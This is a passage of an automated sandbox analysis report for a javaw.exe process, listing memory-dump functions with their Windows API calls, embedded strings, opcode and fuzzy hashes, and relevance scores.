Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Valuejio_snprintf
String ID: %s: %s$C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp
API String ID: 927349343-787771327
Opcode ID: 55e3db197a29240228acec9166a95f35af80939f7d36308aa1854bb7aaa3d47c
Instruction ID: 01bf6d14dfaf7d06bc3446bf6926d5f70efa5579631c633d97ffb21048971d60
Opcode Fuzzy Hash: 55e3db197a29240228acec9166a95f35af80939f7d36308aa1854bb7aaa3d47c
Instruction Fuzzy Hash: 9631B171504218ABDB14DF50CC41FAAB7B9FF48314F0084A9E75957681DF716E89CF94

Function 6FACBF25 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 299fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6FACC119

Strings

exclusive, xrefs: 6FACC0A8
winOpen, xrefs: 6FACC288

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: CreateFile
String ID: exclusive$winOpen
API String ID: 823142352-1568912604
Opcode ID: 8ccb32e28400b4268494303374e363654cdd115852400d69e78c7a3d2cc946df
Instruction ID: c94b2c2810ff9d1c20a6d6ce5f978820b023ee3b6f0d67dcb962161040fa0ea7
Opcode Fuzzy Hash: 8ccb32e28400b4268494303374e363654cdd115852400d69e78c7a3d2cc946df
Instruction Fuzzy Hash: 0ED1C174904348CFDB10DFA9C58478DBBF0BF45318F14852AE868AB295EB79D985CF42

Function 6D5E6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000), ref: 6D5E6E37
GetProcessAffinityMask.KERNEL32(00000000), ref: 6D5E6E3E

Part of subcall function 6D5CF810: strchr.VCRUNTIME140(?,00000025,?,00000000,-00000001), ref: 6D5CF82F
Part of subcall function 6D5CF810: memmove.VCRUNTIME140(?,?,?), ref: 6D5CF885

Strings

active_processor_count: active processor count set by user : %d, xrefs: 6D5E6DF9

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Process$AffinityCurrentMaskmemmovestrchr
String ID: active_processor_count: active processor count set by user : %d
API String ID: 4045917004-13208298
Opcode ID: 68cbb8daa7d878472341db174ffefb2594465bf5aac99190a7e01a4c07287043
Instruction ID: 567a670bc42847451736b3557692e7a55c87c2627fcd660248d09486a4aad445
Opcode Fuzzy Hash: 68cbb8daa7d878472341db174ffefb2594465bf5aac99190a7e01a4c07287043
Instruction Fuzzy Hash: 2501F732A002099FEF04EAE8D9487EFB7BDDB45285F0049A9E914D3640EB319D5087D2

Function 6D5A3040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,?,?,6D52CA62,?,000000FF), ref: 6D5A306A

Strings

Thread added: 0x%08x, xrefs: 6D5A3158
Arena::Amalloc_4, xrefs: 6D5A308C

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: Arena::Amalloc_4$Thread added: 0x%08x
API String ID: 3702945584-887605203
Opcode ID: 02ae34760e8451da426d57079e738e750a7aaadd18cca14697d1956fb6c95dfc
Instruction ID: 72074359df770e0b1152934a6f2ec68d775b3269c5eb3e8dfae10490d1451ef4
Opcode Fuzzy Hash: 02ae34760e8451da426d57079e738e750a7aaadd18cca14697d1956fb6c95dfc
Instruction Fuzzy Hash: 26310970A04222AFEB15CF64C880BAEB7A4BF1675DF188939EE049B642D731D940C7E1

Function 00E172B5 Relevance: 4.6, APIs: 3, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: __dosmaperr
String ID:
API String ID: 2332233096-0
Opcode ID: 8ece2cd0dbd09836417fa1a918df9055baeb1215a2f3776e000468b7ac387204
Instruction ID: e80c1c386bc1a41b8d748a9fc14dea8a55d198b3af5929bf205f3c69e3539616
Opcode Fuzzy Hash: 8ece2cd0dbd09836417fa1a918df9055baeb1215a2f3776e000468b7ac387204
Instruction Fuzzy Hash: 1221F871905208BBEB10AB70AC46FEE37B9AF41B34F251210FD617B1D1DBB15E85E1A1

Function 00E16E40 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00E16E89
GetLastError.KERNEL32 ref: 00E16E95
__dosmaperr.LIBCMT ref: 00E16E9C

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 0ba346d56d0bd8119adb4e3167e6e82113360f894ebcba7ac4bf674df89843c1
Instruction ID: 196b432e1fe2cb8cafe3efd56841f83acf365b75aef07fc82464309c923f5b2c
Opcode Fuzzy Hash: 0ba346d56d0bd8119adb4e3167e6e82113360f894ebcba7ac4bf674df89843c1
Instruction Fuzzy Hash: 39019A36A01219AFCF15AFA1DC06AEE7BB8FF00364F009169F801B2151DB71CE90DB90

Function 00E16D99 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00E1CE09: GetLastError.KERNEL32(00000000,?,00E16A48,00E1AD7F,?,?,00E1CD05,00000001,00000364,?,00000006,000000FF,?,00E16D09,00E35010,0000000C), ref: 00E1CE0D
Part of subcall function 00E1CE09: SetLastError.KERNEL32(00000000), ref: 00E1CEAF

CloseHandle.KERNEL32(?,?,?,00E16ED0,?,?,00E16D42,00000000), ref: 00E16DCA
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00E16ED0,?,?,00E16D42,00000000), ref: 00E16DE0
ExitThread.KERNEL32 ref: 00E16DE9

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: e0c9545e69d6684c72f9dbafccad3e3096aa76b73c069f6d0eafd1b930851e6a
Instruction ID: c5093171fd3ce628cb3153cd7a350c1114b84a190987ff6109eb7ea6969cf0de
Opcode Fuzzy Hash: e0c9545e69d6684c72f9dbafccad3e3096aa76b73c069f6d0eafd1b930851e6a
Instruction Fuzzy Hash: 18F082306046656BCB313F75DD4CADA3A986F01368F186610F825F21E1EB30DDC6C690

Function 00E1121F Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000002,?,00E11219,00E1A1A8,00E1A1A8,?,00000002,F3FD1227,00E1A1A8,00000002), ref: 00E11230
TerminateProcess.KERNEL32(00000000,?,00E11219,00E1A1A8,00E1A1A8,?,00000002,F3FD1227,00E1A1A8,00000002), ref: 00E11237
ExitProcess.KERNEL32 ref: 00E11249

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f46e252ee9de1e2771d01fa8cbb87237c88c7d8a55b68c5b72ed213c5c202ac9
Instruction ID: a659c433a34a31ab711096451d5d1f8f3e5dceff06b4bb615d0a4bf1ba006e61
Opcode Fuzzy Hash: f46e252ee9de1e2771d01fa8cbb87237c88c7d8a55b68c5b72ed213c5c202ac9
Instruction Fuzzy Hash: FBD09E3110410CAFDF112F61EC0DDDD3F69BF44391F546050FA15A5172DF759996EA50

Function 6FAA96C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 6FAA9774

Strings

winRead, xrefs: 6FAA97B7

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: FileRead
String ID: winRead
API String ID: 2738559852-2759563040
Opcode ID: c2c7a8c34ea05787874e99a34c1672cf5ad00b01611da2ee114f1d604b19ace1
Instruction ID: 37db1b9c5d677d2f8d21ac452d6b957bad08c298b8c2ece9e50bb46f3c8f5117
Opcode Fuzzy Hash: c2c7a8c34ea05787874e99a34c1672cf5ad00b01611da2ee114f1d604b19ace1
Instruction Fuzzy Hash: 8441C575A05208DFCB44CFA9DA8058EB7F2FF88350F14852AE828E7344EB36E955CB51

Function 00E04576 Relevance: 3.3, APIs: 2, Instructions: 289COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E046BB

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 880ab6cd42e4a65846bde46fef5c2fd0944bbf419f089e9627d8a65a64261349
Instruction ID: 5015c601bbca576031496c7ffbf33b1bb65bf6a239d0d1013d8035d2b284ae53
Opcode Fuzzy Hash: 880ab6cd42e4a65846bde46fef5c2fd0944bbf419f089e9627d8a65a64261349
Instruction Fuzzy Hash: F4910CF2D081B00ADB5D8E394CE127A7FD59B85242F0942AEFDE9E61C3E56CC94487B1

Function 00E175AF Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00E174E6,?,?,00000000,00000000), ref: 00E175DD
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00E174E6,?,?,00000000,00000000), ref: 00E175F1

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 1be8300004f1e7b584717b68487f34ee90e5272596d866775d9887bec993d5ad
Instruction ID: 1330afc94082bef7f255bd476376f8de7a475dfdc78ef12f066ce79cb58174c6
Opcode Fuzzy Hash: 1be8300004f1e7b584717b68487f34ee90e5272596d866775d9887bec993d5ad
Instruction Fuzzy Hash: E1111C7290410DABCB10DFA5C845EDF77BCAB08724F605262E912F2181EB30EB48CB60

Function 00E16885 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00E169A1,00000000,?,?,00000002,00000000), ref: 00E168C1
GetLastError.KERNEL32(00000000,?,00E169A1,00000000,?,?,00000002,00000000,?,00E1F2A3,?,00000000,00000000,00000002,?,?), ref: 00E168CE

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d92f135c850c99b4ff90fba4528c66cbd51269483781f2b5bbe4af9fc61fca5b
Instruction ID: 2ab7be8a0ce55f79cd778a4a63b9afefbaa64762f50d419baeb4559a794f830c
Opcode Fuzzy Hash: d92f135c850c99b4ff90fba4528c66cbd51269483781f2b5bbe4af9fc61fca5b
Instruction Fuzzy Hash: 7901C432A14219AFCF098F59DC05DDE3B69EB85324F281148FC11BB291E671D9919B90

Function 00E16CE4 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00E35010,0000000C), ref: 00E16CF7
ExitThread.KERNEL32 ref: 00E16CFE

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: c1b618ae67e4d454f1f49671082ec1200ddda68368af239c70fa885682643edb
Instruction ID: 91510b98dfedac5b60023864a3fc9e7e4758561653971e8f6f78ba62f0dd4348
Opcode Fuzzy Hash: c1b618ae67e4d454f1f49671082ec1200ddda68368af239c70fa885682643edb
Instruction Fuzzy Hash: 80F0AF75A002059FDB10BBB1D80AFAE3BB4FF44710F201549F001BB2A2CB346A85CBA1

Function 00E1AD8A Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00E2120D,?,00000000,?,?,00E21232,?,00000007,?,?,00E21632,?,?), ref: 00E1ADA0
GetLastError.KERNEL32(?,?,00E2120D,?,00000000,?,?,00E21232,?,00000007,?,?,00E21632,?,?), ref: 00E1ADAB

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1fbcd28c1d5a7536b6a14f99672879c5102b399b0d2f906d00aec630d00ea339
Instruction ID: a649285ad29bef0f2fb7ecb15217855fd75e99104c2d33e6f7b9406cd7a95ab0
Opcode Fuzzy Hash: 1fbcd28c1d5a7536b6a14f99672879c5102b399b0d2f906d00aec630d00ea339
Instruction Fuzzy Hash: 7EE086315016146BCB213BA6AD0DBD53BA8AB80395F845024F508B6461C6308C90C795

Function 00E18B28 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,00E18B17,00E1951C,?,00000000,00000000), ref: 00E18B7E
GetLastError.KERNEL32(?,00000000,?,00E18B17,00E1951C,?,00000000,00000000), ref: 00E18B88

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 209904a0a164eeb5d530f3cf8d121ddbde46f7068bbe02d9d2568c2744f99f54
Instruction ID: bf8e0ae62e0eb85a1cb6c065d5e4bd766cd21e0211676af12b05b0e0f7817813
Opcode Fuzzy Hash: 209904a0a164eeb5d530f3cf8d121ddbde46f7068bbe02d9d2568c2744f99f54
Instruction Fuzzy Hash: FE114877A0C2145EC6282634A949FFD77959BD2738F282159FC09B72C2DE358CC18150

Function 6D5EA340 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(9C64546A), ref: 6D5EA380

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: _getpid
String ID:
API String ID: 1117694923-0
Opcode ID: 85828c3869bf7fd69d6b96aa2fe06fccf3cf43908cccc6de91588bd766fd5d73
Instruction ID: 35e72d8cb01a15822e005b148a0ab21f91e79077f7f840896238c5b388bebc97
Opcode Fuzzy Hash: 85828c3869bf7fd69d6b96aa2fe06fccf3cf43908cccc6de91588bd766fd5d73
Instruction Fuzzy Hash: 3821A171A04306DFDB18DF78C944BAEBBF6FB49354F104639E81593A81D739A841CB92

Function 00E1AEF7 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc62657f8043e96ca21aad40e4d91eae16fbb3406f4e51fec54950fb06215a21
Instruction ID: ea4ccc66f40a404189b1f280cf2f897a0d94f6c7ecce28f915791f1c1229e413
Opcode Fuzzy Hash: fc62657f8043e96ca21aad40e4d91eae16fbb3406f4e51fec54950fb06215a21
